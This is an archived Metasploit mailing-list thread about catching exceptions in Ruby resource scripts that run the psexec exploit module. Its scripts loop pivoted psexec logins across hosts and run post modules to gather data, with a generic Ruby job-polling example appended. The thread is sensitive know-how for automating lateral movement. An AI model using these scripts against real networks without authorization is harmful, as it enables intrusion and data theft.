Metasploit mailing list archives
Re: Catching exploit exceptions in rc script
From: Joshua Smith <lazydj98 () gmail com>
Date: Tue, 26 Jun 2012 12:54:03 -0500
birchfresh and I were direct emailing, thought I would send this to the list:

this works:

<ruby>
run_single("use exploit/windows/smb/psexec")
run_single("set RHOST 1.1.1.1") # <-- this host doesn't exist
begin
  run_single("exploit -j")
rescue
end
</ruby>

[*] resource (/msf/test.rc)> Ruby Code (126 bytes)
RHOST => 1.1.1.1
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.100.101:4444
[*] Connecting to the server...
<a while later>
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (1.1.1.1:445).
URule exploit(psexec) > jobs

Jobs
====

No active jobs.

URule exploit(psexec) >

Something else to keep in mind, inside a ruby block (in an rc file) you're in a weird place in the framework (Msf::Ui::Console::Driver)

cat test.rc
<ruby>
puts self.class
</ruby>

resource test.rc
[*] Processing /msf/test.rc for ERB directives.
[*] resource (/msf/test.rc)> Ruby Code (17 bytes)
Msf::Ui::Console::Driver

-kernelsmith

On Jun 26, 2012, at 10:46 AM, birchfresh wrote:
Hello there.

I'm using msfconsole (newest git) to run a rc script that's essentially something like:

<ruby>
run_single("use windows/smb/psexec")
# [...]
old_sessions = framework.sessions.keys.clone
run_single("exploit -z") rescue nil # script stops here after exception!
new_session = (framework.sessions.keys - old_sessions).first # ids present now but not before
do_something_with(new_session) if new_session
</ruby>

My problem is that if the exploit raises an exception, the script refuses to continue until I press ^C. Shouldn't "rescue nil" catch the exception?

I tried to work around it by running the exploit as a background job (exploit -z -j) and waiting for framework.jobs.length to be decremented, but it's no good: If there's an exception, the job hangs around forever.

For context, I'm doing the following to a number of hosts, one by one: Pivoted login with the psexec module, run a post module to gather some data, kill the session, move on to the next host.

Is there a better way to open a session (and get its number) than to run_single("exploit -z") and poke around in framework.sessions.keys for newcomers?

Or, as a last resort: Is there a way to tell if the exploit at framework.jobs[id] is dead?

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
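The pattern discussed in this thread, as an added example that is not from either poster or from Metasploit: in plain Ruby, a failure raised inside a background thread never reaches a rescue in the caller, so the caller snapshots the session ids, then polls for a new id with a deadline and checks whether the job is still alive. FakeRegistry, launch_job and run_and_collect are hypothetical stand-ins, not framework APIs.

```ruby
# Constructed stand-ins, not Metasploit classes: a session table and a job runner.
class FakeRegistry
  def initialize
    @lock = Mutex.new
    @sessions = {}
    @next_id = 1
  end

  def keys
    @lock.synchronize { @sessions.keys }
  end

  # Registers a session and returns the id it was given.
  def open(label)
    @lock.synchronize { @sessions[@next_id] = label; (@next_id += 1) - 1 }
  end
end

# Starts the work in a thread and returns at once, like a backgrounded job.
# A failure raised later inside the thread never reaches the caller's rescue.
def launch_job(registry, reachable, delay)
  Thread.new do
    Thread.current.report_on_exception = false # keep the demo output quiet
    sleep delay
    raise IOError, "connection timed out" unless reachable
    registry.open("new session")
  end
end

# Returns [session_id_or_nil, status]; status is :opened, :failed or :timeout.
def run_and_collect(registry, reachable, deadline: 2.0, delay: 0.05)
  before = registry.keys
  job = launch_job(registry, reachable, delay)
  stop_at = Process.clock_gettime(Process::CLOCK_MONOTONIC) + deadline
  while Process.clock_gettime(Process::CLOCK_MONOTONIC) < stop_at
    alive = job.alive?               # sample liveness first to avoid a race
    fresh = registry.keys - before   # ids present now that were not there before
    return [fresh.first, :opened] unless fresh.empty?
    return [nil, :failed] unless alive # job ended and left no session behind
    sleep 0.01
  end
  job.kill # bounded wait: never block the script on a stuck job
  [nil, :timeout]
end
```

The difference is taken as current keys minus the earlier snapshot; the reverse order would report sessions that closed rather than ones that opened.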